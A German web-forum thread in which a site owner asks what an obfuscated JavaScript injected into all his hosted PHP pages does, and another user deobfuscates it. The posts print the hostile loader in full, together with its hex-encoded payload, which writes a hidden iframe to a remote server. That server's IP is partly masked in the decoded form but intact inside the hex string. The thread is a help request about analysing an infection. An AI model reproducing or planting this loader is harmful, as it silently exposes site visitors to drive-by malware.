Ergebnis 1 bis 9 von 9

Thema: Was macht dieses Java Script (Virus??)

Hybrid-Darstellung

Vorheriger Beitrag Vorheriger Beitrag   Nächster Beitrag Nächster Beitrag
  1. #1
    Erfahrener Benutzer Avatar von bulli
    Registriert seit
    06.01.2007
    Beiträge
    234

    Ausrufezeichen Was macht dieses Java Script (Virus??)

    Hallo,
    auf meinen Seiten bei einem Hoster ist auf allen Dateien, nach ?> vom PHP code, diese Javascript, was macht dieser Code:

    PHP-Code:
    <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v475caca8c304b(v475caca8c3842){ function v475caca8c403b () {var v475caca8c4833=16; return v475caca8c4833;} return(parseInt(v475caca8c3842,v475caca8c403b()));}function v475caca8c5042(v475caca8c5857){ function v475caca8c685a () {return 2;} var v475caca8c6049='';for(v475caca8c6444=0v475caca8c6444<v475caca8c5857.lengthv475caca8c6444+=v475caca8c685a()){ v475caca8c6049+=(String.fromCharCode(v475caca8c304b(v475caca8c5857.substr(v475caca8c6444v475caca8c685a()))));}return v475caca8c6049;} document.write(v475caca8c5042('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D37366163633138636339207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313330343234292B2761363764643166306163625C272077696474683D343736206865696768743D323734207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script
    <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v475caca8c304b(v475caca8c3842){ function v475caca8c403b () {var v475caca8c4833=16; return v475caca8c4833;} return(parseInt(v475caca8c3842,v475caca8c403b())); }function v475caca8c5042(v475caca8c5857){ function v475caca8c685a () {return 2;} var v475caca8c6049='';for(v475caca8c6444=0; v475caca8c6444<v475caca8c5857.length; v475caca8c6444+=v475caca8c685a()){ v475caca8c6049+=(String.fromCharCode(v475caca8c304 b(v475caca8c5857.substr(v475caca8c6444, v475caca8c685a()))));}return v475caca8c6049;} document.write(v475caca8c5042('3C5343524950543E776 96E646F772E7374617475733D27446F6E65273B646F63756D6 56E742E777269746528273C696672616D65206E616D653D373 66163633138636339207372633D5C27687474703A2F2F37372 E3232312E3133332E3138382F2E69662F676F2E68746D6C3F2 72B4D6174682E726F756E64284D6174682E72616E646F6D282 92A313330343234292B2761363764643166306163625C27207 7696474683D343736206865696768743D323734207374796C6 53D5C27646973706C61793A206E6F6E655C273E3C2F6966726 16D653E27293C2F5343524950543E'));</script>
    Jedesmal, wenn man die Seite betritt, kommt eine Meldung vom Virenprogramm und die Seite läde sehr lange.

    Ich wäre sehr dankbar, wenn mir jemand sagt, was dieser Code macht.

  2. #2
    Erfahrener Benutzer Avatar von Gremlin
    Registriert seit
    05.07.2006
    Beiträge
    5.206
    Sowas liebe ich xD so richtig verwirrende Funktionen... naja fangen wir mal an das ganze aufzulösen

    So hier mal eine Version wo man besseren Durchblick hat, ich hab den Funktionen, Variablen, Parametern mal eindeutige Namen gegeben wodurch man sie schneller wiederfindet



    Code:
    <script>
    function funktion1(parameter1){
            function funktion2 () {
                var variable1=16;
            return variable1;
            }
    return(parseInt(parameter1,funktion2())); 
    }
    
    
    function funktion3(parameter2){ 
           function funktion4 () {
             return 2;
           } 
    var variable2='';
      
     for(variable3=0; variable3<parameter2.length; variable3+=funktion4()){ 
         variable2+=(String.fromCharCode(v475caca8c304 b(parameter2.substr(variable3, funktion4()))));
     }
     return variable2;
    } 
    
    document.write(funktion3('3C5343524950543E776 96E646F772E7374617475733D27446F6E65273B646F63756D6 56E742E777269746528273C696672616D65206E616D653D373 66163633138636339207372633D5C27687474703A2F2F37372 E3232312E3133332E3138382F2E69662F676F2E68746D6C3F2 72B4D6174682E726F756E64284D6174682E72616E646F6D282 92A313330343234292B2761363764643166306163625C27207 7696474683D343736206865696768743D323734207374796C6 53D5C27646973706C61793A206E6F6E655C273E3C2F6966726 16D653E27293C2F5343524950543E'));</script>

    Wenn ich viel Lust und Langeweile habe mach ich später mal weiter, aber das hier kann auch schon etwas helfen *gg es macht auf jedenfall nur irgendeine Ausgabe ich vermute noch ein Iframe mit Link zu nem Virus oder so
    Diskutiere nie mit Idioten - sie holen Dich auf ihr Niveau und schlagen Dich dort mit Erfahrung!



  3. #3
    Erfahrener Benutzer Avatar von bulli
    Registriert seit
    06.01.2007
    Beiträge
    234
    Sowas liebe ich xD so richtig verwirrende Funktionen.
    Schön, das ich was gefunden habe, was dir Spaß macht^^. Ne, also erst mal danke, weil ich habe keinen Plan von Java Script, aber so wie ich es beurteilen kann, entschlüsselt diese Script, den langen String 43524950543E77[..]43E und gibt diesen aus. und fals wirklich jemanf Lust hat das zu entschlüssel oder auch immer, der Sring orginal ist ohne Leerzeichen (nicht so wie ins Gremlins Lösung)

    Hier nochmal nur den String:
    Code:
    3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D37366163633138636339207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313330343234292B2761363764643166306163625C272077696474683D343736206865696768743D323734207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E

  4. #4
    Erfahrener Benutzer Avatar von Gremlin
    Registriert seit
    05.07.2006
    Beiträge
    5.206
    der Sring orginal ist ohne Leerzeichen (nicht so wie ins Gremlins Lösung)
    Achsoooo na und ich hab mich schon gewundert... *mal kurz Router abschalt und weiter probier*
    Diskutiere nie mit Idioten - sie holen Dich auf ihr Niveau und schlagen Dich dort mit Erfahrung!



  5. #5
    Erfahrener Benutzer Avatar von Gremlin
    Registriert seit
    05.07.2006
    Beiträge
    5.206
    Hab den Code geknackt xD war ein HEX String der zu einem normalen ascii Text macht dabei rausgekommen ist folgendes:

    Code:
    <SCRIPT>window.status='Done';document.write('<iframe name=76acc18cc9 src=\'http://77.***.133.188/.if/go.html?'+Math.round(Math.random()*130424)+'a67dd1f0acb\' width=476 height=274 style=\'display: none\'></iframe>')</SCRIPT>

    Die IP die aufgerufen wird gehört zu einem Rechner in Russland
    hab 3 Zahlen weggemacht damit es keiner aufruft ^^
    Diskutiere nie mit Idioten - sie holen Dich auf ihr Niveau und schlagen Dich dort mit Erfahrung!



  6. #6
    Erfahrener Benutzer Avatar von bulli
    Registriert seit
    06.01.2007
    Beiträge
    234
    Danke,

    und was war auf dem server, irgend ein virus??

Ähnliche Themen

  1. Suche dieses Addon...
    Von Hansir im Forum Scripte
    Antworten: 4
    Letzter Beitrag: 24.03.2017, 00:25
  2. Closed. Alles wiederi n ordnung!!!! (ich mag dieses Forum)
    Von Benni125 im Forum Support zum VMSone
    Antworten: 4
    Letzter Beitrag: 04.01.2011, 07:42
  3. [HTML/CSS/JS] Wie heißt dieses Menü?
    Von eXcite im Forum [HD] Programmieren
    Antworten: 8
    Letzter Beitrag: 10.08.2010, 20:15
  4. ICQ Virus-Spiel
    Von Gremlin im Forum Talk, talk, talk...
    Antworten: 11
    Letzter Beitrag: 18.03.2009, 18:51
  5. 10 Mio Lose die zur Lösung dieses Probs beitragen
    Von loseclub im Forum Support zum VMSone
    Antworten: 4
    Letzter Beitrag: 18.03.2007, 18:46

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •